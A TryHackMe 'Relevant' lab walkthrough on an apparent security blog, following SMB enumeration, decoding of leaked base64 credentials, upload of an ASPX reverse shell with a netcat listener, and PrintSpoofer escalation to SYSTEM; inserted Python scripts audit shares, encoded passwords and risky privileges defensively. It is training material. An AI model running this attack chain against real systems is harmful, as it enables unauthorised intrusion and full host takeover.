ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are in every major security; just need to understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Technology is the best way to change everything, like mindset and goal.


    TryHackMe relevant penetration testing walkthrough



    We have been engaged for a black-box penetration test (the IP address may differ in your instance). Our goal is to read the user flag and root flag files on the machine. On some machines you will be required to exploit the abuse of write permission on a Samba service in order to read the flag.

    Some machines are exploitable instantly, but some might require exploiting other ones first. Enumerate every compromised machine to identify valuable information that will help you proceed further into the environment.

    If you are stuck on one of the machines, don't overthink and start pentesting another one.

    When you read the flag file, you can be sure that the machine was successfully compromised. But keep your eyes open - apart from the flag, other useful information may be present on the system.



    Pre-Engagement Briefing


    You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.


    Scope of Work


    The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test).  The client has asked that you secure two flags (no location provided) as proof of exploitation:

        User.txt
        Root.txt




    Additionally, the client has provided the following scope allowances:


    # Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first
    # Locate and note all vulnerabilities found
    # Submit the flags discovered to the dashboard
    # Only the IP address assigned to your machine is in scope
    # Find and report ALL vulnerabilities (yes, there is more than one path to root)

     

    Penetration Testing Methodology


    Reconnaissance

    # Nmap



    Enumeration

    # Smbclient
    # Smbmap



    Exploiting

    # Abuse of write permission in Samba service



    Privilege Escalation

    # SeImpersonatePrivilege enabled for the compromised account



    Let's start with reconnaissance of the machine (your target IP may differ from ours); first, a scan with nmap:



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo nmap -sC -sV  10.10.220.229                                                                                                                                                  130 ⨯
    Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 11:22 IST
    Nmap scan report for 10.10.220.229
    Host is up (0.35s latency).
    Not shown: 995 filtered tcp ports (no-response)
    PORT     STATE SERVICE       VERSION
    80/tcp   open  http          Microsoft IIS httpd 10.0
    |_http-server-header: Microsoft-IIS/10.0
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-title: IIS Windows Server
    135/tcp  open  msrpc         Microsoft Windows RPC
    139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp  open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
    3389/tcp open  ms-wbt-server Microsoft Terminal Services
    |_ssl-date: 2022-03-17T05:53:59+00:00; 0s from scanner time.
    | ssl-cert: Subject: commonName=Relevant
    | Not valid before: 2022-03-16T05:13:22
    |_Not valid after:  2022-09-15T05:13:22
    | rdp-ntlm-info: 
    |   Target_Name: RELEVANT
    |   NetBIOS_Domain_Name: RELEVANT
    |   NetBIOS_Computer_Name: RELEVANT
    |   DNS_Domain_Name: Relevant
    |   DNS_Computer_Name: Relevant
    |   Product_Version: 10.0.14393
    |_  System_Time: 2022-03-17T05:53:20+00:00
    Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    |_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s
    | smb2-time: 
    |   date: 2022-03-17T05:53:20
    |_  start_date: 2022-03-17T05:14:03
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   3.1.1: 
    |_    Message signing enabled but not required
    | smb-os-discovery: 
    |   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
    |   Computer name: Relevant
    |   NetBIOS computer name: RELEVANT\x00
    |   Workgroup: WORKGROUP\x00
    |_  System time: 2022-03-16T22:53:20-07:00
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 74.72 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    
    
    
    
    
    
    

    Then we enumerate with enum4linux, but unfortunately we get nothing from it (the null session is refused); we keep trying.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ enum4linux 10.10.220.229              
    Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 17 10:47:18 2022
    
     ========================== 
    |    Target Information    |
     ========================== 
    Target ........... 10.10.220.229
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
    
    
     ===================================================== 
    |    Enumerating Workgroup/Domain on 10.10.220.229    |
     ===================================================== 
    [E] Can't find workgroup/domain
    
    
     ============================================= 
    |    Nbtstat Information for 10.10.220.229    |
     ============================================= 
    Looking up status of 10.10.220.229
    No reply from 10.10.220.229
    
     ====================================== 
    |    Session Check on 10.10.220.229    |
     ====================================== 
    Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
    [E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$                                                                                                                                                                                     1 ⨯
    
    



    You can also enumerate SMB with nmap's smb-enum* scripts:

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ nmap -p 139,445 -Pn --script smb-enum* 10.10.220.229
    Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 12:31 IST
    Nmap scan report for 10.10.220.229
    Host is up (0.35s latency).
    
    PORT    STATE SERVICE
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds
    
    Host script results:
    | smb-enum-shares: 
    |   account_used: guest
    |   \\10.10.220.229\ADMIN$: 
    |     Type: STYPE_DISKTREE_HIDDEN
    |     Comment: Remote Admin
    |     Anonymous access: <none>
    |     Current user access: <none>
    |   \\10.10.220.229\C$: 
    |     Type: STYPE_DISKTREE_HIDDEN
    |     Comment: Default share
    |     Anonymous access: <none>
    |     Current user access: <none>
    |   \\10.10.220.229\IPC$: 
    |     Type: STYPE_IPC_HIDDEN
    |     Comment: Remote IPC
    |     Anonymous access: <none>
    |     Current user access: READ/WRITE
    |   \\10.10.220.229\nt4wrksv: 
    |     Type: STYPE_DISKTREE
    |     Comment: 
    |     Anonymous access: <none>
    |_    Current user access: READ/WRITE
    | smb-enum-sessions: 
    |_  <nobody>
    
    Nmap done: 1 IP address (1 host up) scanned in 97.83 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
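The scan above is useful beyond this box: the same `smb-enum-shares` output, read on any host you administer, tells you which shares a guest session can write to. The script below is an added example (not part of the walkthrough) that parses the indented `key: value` layout the NSE script prints and reports writable disk shares; the sample input is a constructed copy of the block shown in the scan, with the share names and access levels it reported.

```python
"""Flag SMB shares that nmap's smb-enum-shares script reports as writable by
the account the scan used (here the unauthenticated guest account).

Added example, not part of the walkthrough. SAMPLE is a constructed copy of
the script output shown above.
"""
import re

SAMPLE = r"""
| smb-enum-shares:
|   account_used: guest
|   \\10.10.220.229\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.220.229\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.220.229\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\10.10.220.229\nt4wrksv:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: <none>
|_    Current user access: READ/WRITE
"""

# A share header line looks like "\\host\name:"; capture the share name.
SHARE_RE = re.compile(r"^\\\\[^\\]+\\([^:]+):$")


def parse_smb_enum_shares(text):
    """Return (account_used, {share_name: {field: value}})."""
    account = None
    shares = {}
    current = None
    for raw in text.splitlines():
        line = raw.lstrip("|_ ").rstrip()  # drop nmap's "|" / "|_" margin and indentation
        if not line:
            continue
        match = SHARE_RE.match(line)
        if match:
            current = match.group(1)
            shares[current] = {}
            continue
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "account_used":
            account = value
        elif current is not None:
            shares[current][key] = value
    return account, shares


def writable_shares(text, disk_only=True):
    """Return (account_used, [names of shares the account can write to]).

    With disk_only=True the IPC$ pipe share is skipped: write access there is
    normal and is not a place files can be dropped, whereas a writable disk
    share reachable as guest is a misconfiguration worth reporting.
    """
    account, shares = parse_smb_enum_shares(text)
    hits = []
    for name, fields in shares.items():
        if "WRITE" not in fields.get("Current user access", "").upper():
            continue
        if disk_only and not fields.get("Type", "").startswith("STYPE_DISKTREE"):
            continue
        hits.append(name)
    return account, hits


if __name__ == "__main__":
    account, hits = writable_shares(SAMPLE)
    for name in hits:
        print(f"[!] share {name} is writable by account '{account}'")
```

Run against the sample it reports only `nt4wrksv`; pass `disk_only=False` to see `IPC$` as well. The remediation on a real server is the obvious one: disable guest access to file shares and restrict the share and NTFS ACLs to the accounts that need write access.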
    
    
    






    Visiting the web service on port 80, we check the page source and robots.txt; there seems to be nothing useful.





    Network share


    Let’s start with the network share. Listing the shares reveals the presence of nt4wrksv.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$  smbclient -L //10.10.220.229
    Enter WORKGROUP\kali's password: 
    
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        nt4wrksv        Disk      
    SMB1 disabled -- no workgroup available
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    


    Connecting to this share reveals a password file:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo smbclient //10.10.220.229/nt4wrksv
    Enter WORKGROUP\root's password: 
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Sun Jul 26 03:16:04 2020
      ..                                  D        0  Sun Jul 26 03:16:04 2020
      passwords.txt                       A       98  Sat Jul 25 20:45:33 2020
    
                    7735807 blocks of size 4096. 4922488 blocks available
    smb: \> get passwords.txt
    getting file \passwords.txt of size 98 as passwords.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
    smb: \> #www.hackingtruth.org
    
    
    
    

     

    The file contains base64-encoded credentials; decoding it reveals two sets of credentials.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ ls
    content.txt  passwords.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ cat passwords.txt
    [User Passwords - Encoded]
    Qm9iIC0gIVBAJCRXMHJEITEyMw==
    QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk                                                                                                                                                    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    


    To decode them you can use many methods (online tools, offline tools, the terminal, etc.), but here we will use the hURL tool, so first install it and then use it as shown below.


     


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo apt-get install hurl 
    
    Reading package lists... Done
    Building dependency tree... Done
    Reading state information... Done
    The following packages were automatically installed and are no longer required:
      libblkid-dev libglib2.0-dev-bin libmount-dev libpcre16-3 libpcre2-dev libpcre2-posix3 libpcre3-dev libpcre32-3 libpcrecpp0v5 libselinux1-dev libsepol-dev mypaint-brushes mypaint-data
      mypaint-data-extras uuid-dev
    Use 'sudo apt autoremove' to remove them.
    The following NEW packages will be installed:
      hurl
    0 upgraded, 1 newly installed, 0 to remove and 903 not upgraded.
    Need to get 19.5 kB of archives.
    After this operation, 191 kB of additional disk space will be used.
    Get:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 hurl all 2.1-0kali2 [19.5 kB]
    Fetched 19.5 kB in 14s (1,432 B/s)
    Selecting previously unselected package hurl.
    (Reading database ... 431755 files and directories currently installed.)
    Preparing to unpack .../hurl_2.1-0kali2_all.deb ...
    Unpacking hurl (2.1-0kali2) ...
    Setting up hurl (2.1-0kali2) ...
    Processing triggers for kali-menu (2021.4.2) ...
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ hURL -b "Qm9iIC0gIVBAJCRXMHJEITEyMw=="
    
    Original string       :: Qm9iIC0gIVBAJCRXMHJEITEyMw==                                                                                                                                       
    base64 DEcoded string :: Bob - !P@$$W0rD!123
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ hURL -b "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk"
    
    Original string       :: QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk                                                                                                                           
    base64 DEcoded string :: Bill - Juw4nnaM4n420696969!$$$
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d            
    Bob - !P@$$W0rD!123                                                                                                                                                                         ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ #www.kumaratuljaiswal.in    #www.hackingtruth.in
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
    Bill - Juw4nnaM4n420696969!$$$                                                                                                                                                              ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$                          
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d;echo""
    Bill - Juw4nnaM4n420696969!$$$
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d;echo""            
    Bob - !P@$$W0rD!123
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
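Whether you use hURL or `base64 -d`, the decoding itself is the easy part; the point a practitioner should take from this step is that a strict decoder plus a format check separates real encoded credentials from noise. The following is an added example, not part of the walkthrough and not using hURL: it reads the `[User Passwords - Encoded]` layout, rejects lines that are not valid base64 or not text, and splits each decoded line on `" - "`. The sample reproduces the two lines the walkthrough found in passwords.txt plus one constructed junk line; the `"<user> - <password>"` format is assumed from those two lines.

```python
"""Decode the '[User Passwords - Encoded]' file found on the nt4wrksv share.

Added example, not part of the walkthrough. PASSWORDS_TXT is a constructed
copy of passwords.txt with one extra invalid line appended.
"""
import base64
import binascii

PASSWORDS_TXT = """\
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
this-is-not-base64!
"""


def decode_token(token):
    """Strictly decode one base64 token to text, or return None.

    validate=True rejects characters outside the base64 alphabet instead of
    silently discarding them, and a payload that is not UTF-8 text is also
    rejected, so binary or random data never gets reported as a credential.
    """
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def parse_encoded_passwords(text):
    """Return [(user, password)] for every line that decodes to 'user - password'.

    Section headers in [brackets], blank lines and lines that fail strict
    decoding are skipped. The decoded values carry no trailing newline, which
    is why `base64 -d` in the terminal prints the next prompt on the same line
    unless an `echo` is appended, as the walkthrough does.
    """
    pairs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("["):
            continue
        decoded = decode_token(line)
        if decoded is None or " - " not in decoded:
            continue
        user, _, password = decoded.partition(" - ")
        pairs.append((user, password))
    return pairs


if __name__ == "__main__":
    for user, password in parse_encoded_passwords(PASSWORDS_TXT):
        print(f"{user}: {password}")
```

Base64 is an encoding, not encryption: a file like this on a share readable by guest is equivalent to a plaintext password file, which is the finding to write up.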
    
    
    
    
    

    It is time to use smbmap with the credentials we found. We can see that we have write access to the share “nt4wrksv”.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ smbmap -H 10.10.220.229 -u bob -p '!P@$$W0rD!123'
    [+] IP: 10.10.220.229:445       Name: 10.10.220.229                                     
            Disk                                                    Permissions     Comment
            ----                                                    -----------     -------
            ADMIN$                                                  NO ACCESS       Remote Admin
            C$                                                      NO ACCESS       Default share
            IPC$                                                    READ ONLY       Remote IPC
            nt4wrksv                                                READ, WRITE
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    
    
    



     

     

     

    We test whether the share directory is reachable through a web service, and find the right one running on port 49663, which serves the contents of the Samba share.




    Exploiting


    We upload a “shell.aspx”, a web shell that lets us execute commands from the browser. But first we download shell.aspx:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo wget https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
    [sudo] password for hackerboy: 
    --2022-03-18 12:33:57--  https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
    Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 2606:50c0:8003::154, 2606:50c0:8000::154, 2606:50c0:8001::154, ...
    Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8003::154|:443... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 15968 (16K) [text/plain]
    Saving to: ‘shell.aspx’
    
    shell.aspx                                     100%[====================================================================================================>]  15.59K  --.-KB/s    in 0.002s  
    
    2022-03-18 12:34:04 (9.54 MB/s) - ‘shell.aspx.1’ saved [15968/15968]
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$
    
    
    



    After downloading shell.aspx, edit the IP address and port inside it to point at your (attacker) machine.




    Now we can upload the shell to the Samba share with this command:

    sudo smbclient //10.10.177.40/nt4wrksv -u bob -p


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo smbclient //10.10.177.40/nt4wrksv -u bob -p
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Sun Jul 26 03:16:04 2020
      ..                                  D        0  Sun Jul 26 03:16:04 2020
      passwords.txt                       A       98  Sat Jul 25 20:45:33 2020
    
                    7735807 blocks of size 4096. 4951344 blocks available
    smb: \> put shell.aspx
    putting file shell.aspx as \shell.aspx (1.1 kb/s) (average 1.1 kb/s)
    smb: \> 
    



    Then we open this URL in the browser to trigger the reverse shell:

    10.10.162.140:49663/nt4wrksv/shell.aspx (this IP belongs to the vulnerable machine)

    and catch the connection with this listener in our terminal (the port must match the one set in shell.aspx, and the listener should already be running when the page is requested):

    nc -nvlp 4444

    Once the reverse shell is connected to your system, we look for the user flag. I searched every directory and file and finally found it; I recommend you find it yourself first.


    User flag


    Privilege Escalation (NT AUTHORITY\SYSTEM) (Root Flag)

    We run “whoami /priv” and see that the account holds the privilege “SeImpersonatePrivilege”, which is enabled.


    c:\Users\Bob\Desktop>whoami /priv           
    whoami /priv
    
    PRIVILEGES INFORMATION
    ----------------------
    
    Privilege Name                Description                               State   
    ============================= ========================================= ========
    SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
    SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
    SeAuditPrivilege              Generate security audits                  Disabled
    SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
    SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
    SeCreateGlobalPrivilege       Create global objects                     Enabled 
    SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
    
    c:\Users\Bob\Desktop> 
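The same `whoami /priv` table is what a defender should be reading on their own servers: which service accounts hold impersonation-class privileges, and whether they need them. The script below is an added example, not part of the walkthrough. It parses the table format and reports every held privilege from its own list of commonly abused ones; `WHOAMI_OUTPUT` is a constructed copy of the output above, and `HIGH_RISK` is this example's own selection, with descriptions paraphrased from the Windows privilege names.

```python
"""Audit `whoami /priv` output for privileges commonly abused for local
privilege escalation.

Added example, not part of the walkthrough. WHOAMI_OUTPUT is a constructed
copy of the table shown above; HIGH_RISK is this example's own list.
"""

# Privileges a web or service account should not hold without a documented need.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate a client after authentication",
    "SeAssignPrimaryTokenPrivilege": "replace a process-level token",
    "SeDebugPrivilege": "debug programs (access any process)",
    "SeBackupPrivilege": "back up files and directories (read past ACLs)",
    "SeRestorePrivilege": "restore files and directories (write past ACLs)",
    "SeTakeOwnershipPrivilege": "take ownership of files or other objects",
    "SeLoadDriverPrivilege": "load and unload device drivers",
}

WHOAMI_OUTPUT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_whoami_priv(text):
    """Return {privilege_name: 'Enabled' | 'Disabled'} from `whoami /priv` output.

    Header, separator and blank lines are skipped by requiring the last
    whitespace-separated field to be a token state; the description column in
    between may contain any number of words.
    """
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[-1] not in ("Enabled", "Disabled"):
            continue
        privs[parts[0]] = parts[-1]
    return privs


def high_risk_privileges(text):
    """Return [(name, state, description)] for every held privilege in HIGH_RISK.

    'Disabled' only means the privilege is not active in the current token; it
    is still assigned to the account, and a process running as that account can
    enable it. Disabled entries are therefore reported alongside enabled ones.
    """
    privs = parse_whoami_priv(text)
    return [(name, state, HIGH_RISK[name])
            for name, state in privs.items() if name in HIGH_RISK]


if __name__ == "__main__":
    for name, state, why in high_risk_privileges(WHOAMI_OUTPUT):
        print(f"[!] {name} ({state}): {why}")
```

On the sample this flags `SeImpersonatePrivilege` (Enabled) and `SeAssignPrimaryTokenPrivilege` (Disabled). Service identities such as IIS application pool accounts hold SeImpersonatePrivilege by default, which is exactly why a web application compromise on this box carries that privilege with it; the audit tells you which accounts would, and whether the host is patched against the known abuses of it.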
     

     

     

    I started to Google how this privilege is abused on Windows 2016, and I found this GitHub project that worked for me (after several attempts xD).

     


    PrintSpoofer


    To exploit this impersonation privilege, the standard potato exploit won’t work, and we’ll use a new tool called PrintSpoofer.


    First we download the PrintSpoofer.exe file, which lets us obtain administrator-level power on Windows, and then we put PrintSpoofer on the Samba share:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo smbclient //10.10.177.40/nt4wrksv -u bob -p
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Sun Jul 26 03:16:04 2020
      ..                                  D        0  Sun Jul 26 03:16:04 2020
      passwords.txt                       A       98  Sat Jul 25 20:45:33 2020
    
                    7735807 blocks of size 4096. 4951344 blocks available
    smb: \>
    smb: \> put PrintSpoofer.exe
    putting file PrintSpoofer.exe as \PrintSpoofer.exe (8.7 kb/s) (average 7.1 kb/s)
    smb: \> 
    smb: \> dir
      .                                   D        0  Fri Mar 18 12:52:00 2022
      ..                                  D        0  Fri Mar 18 12:52:00 2022
      passwords.txt                       A       98  Sat Jul 25 20:45:33 2020
      PrintSpoofer.exe                    A    27136  Fri Mar 18 12:52:02 2022
      shell.aspx                          A    15990  Fri Mar 18 12:38:30 2022
    
                    7735807 blocks of size 4096. 4946925 blocks available
    smb: \> 
    
    
    




    c:\inetpub\wwwroot\nt4wrksv>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is AC3C-5CB5
    
     Directory of c:\inetpub\wwwroot\nt4wrksv
    
    03/18/2022  12:22 AM    <DIR>          .
    03/18/2022  12:22 AM    <DIR>          ..
    07/25/2020  08:15 AM                98 passwords.txt
    03/18/2022  12:22 AM            27,136 PrintSpoofer.exe
    03/18/2022  12:08 AM            15,990 shell.aspx
                   3 File(s)         43,224 bytes
                   2 Dir(s)  20,228,485,120 bytes free
    
    c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer -i -c cmd
    PrintSpoofer -i -c cmd
    [+] Found privilege: SeImpersonatePrivilege
    [+] Named pipe listening...
    [+] CreateProcessAsUser() OK
    Microsoft Windows [Version 10.0.14393]
    (c) 2016 Microsoft Corporation. All rights reserved.
    
    C:\Windows\system32>               
    
    
    
    
    



    Having elevated our privileges with PrintSpoofer, we now look for the root flag:


    Root Flag

    C:\Windows\system32>cd /
    cd /
    
    C:\>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is AC3C-5CB5
    
     Directory of C:\
    
    07/25/2020  08:16 AM    <DIR>           inetpub
    07/25/2020  08:42 AM    <DIR>           Microsoft
    07/16/2016  06:23 AM    <DIR>           PerfLogs
    07/25/2020  08:00 AM    <DIR>           Program Files
    07/25/2020  04:15 PM    <DIR>           Program Files (x86)
    07/25/2020  02:03 PM    <DIR>           Users
    07/25/2020  04:16 PM    <DIR>           Windows
                   0 File(s)              0 bytes
                   7 Dir(s)  20,228,354,048 bytes free
    
    C:\>cd Users
    cd Users
    
    C:\Users>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is AC3C-5CB5
    
     Directory of C:\Users
    
    07/25/2020  02:03 PM    <DIR>           .
    07/25/2020  02:03 PM    <DIR>           ..
    07/25/2020  08:05 AM    <DIR>           .NET v4.5
    07/25/2020  08:05 AM    <DIR>           .NET v4.5 Classic
    07/25/2020  10:30 AM    <DIR>           Administrator
    07/25/2020  02:03 PM    <DIR>           Bob
    07/25/2020  07:58 AM    <DIR>           Public
                   0 File(s)              0 bytes
                   7 Dir(s)  20,228,354,048 bytes free
    
    C:\Users>cd Administrator
    cd Administrator
    
    C:\Users\Administrator>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is AC3C-5CB5
    
     Directory of C:\Users\Administrator
    
    07/25/2020  10:30 AM    <DIR>           .
    07/25/2020  10:30 AM    <DIR>           ..
    07/25/2020  07:58 AM    <DIR>           Contacts
    07/25/2020  08:24 AM    <DIR>           Desktop
    07/25/2020  07:58 AM    <DIR>           Documents
    07/25/2020  08:39 AM    <DIR>           Downloads
    07/25/2020  07:58 AM    <DIR>           Favorites
    07/25/2020  07:58 AM    <DIR>           Links
    07/25/2020  07:58 AM    <DIR>           Music
    07/25/2020  07:58 AM    <DIR>           Pictures
    07/25/2020  07:58 AM    <DIR>           Saved Games
    07/25/2020  07:58 AM    <DIR>           Searches
    07/25/2020  07:58 AM    <DIR>           Videos
                   0 File(s)              0 bytes
                  13 Dir(s)  20,226,048,000 bytes free
    
    C:\Users\Administrator>cd Desktop
    cd Desktop
    
    C:\Users\Administrator\Desktop>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is AC3C-5CB5
    
     Directory of C:\Users\Administrator\Desktop
    
    07/25/2020  08:24 AM    <DIR>           .
    07/25/2020  08:24 AM    <DIR>           ..
    07/25/2020  08:25 AM                35 root.txt
                   1 File(s)             35 bytes
                   2 Dir(s)  20,224,438,272 bytes free
    
    C:\Users\Administrator\Desktop>type root.txt
    type root.txt
    THM{1fk5kf469devly1gl320zafgl345pv}
    C:\Users\Administrator\Desktop>
    
    C:\Users\Administrator\Desktop>hackingtruth.org 
    
    
    
    
    
    
    



    Congratulations we got it :-)




    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



    TryHackMe Content Discovery Walkthrough


    What Is Content Discovery?


    Firstly, we should ask, in the context of web application security, what is content? Content can be many things, a file, video, picture, backup, a website feature. When we talk about content discovery, we're not talking about the obvious things we can see on a website; it's the things that aren't immediately presented to us and that weren't always intended for public access.

    This content could be, for example, pages or portals intended for staff usage, older versions of the website, backup files, configuration files, administration panels, etc.

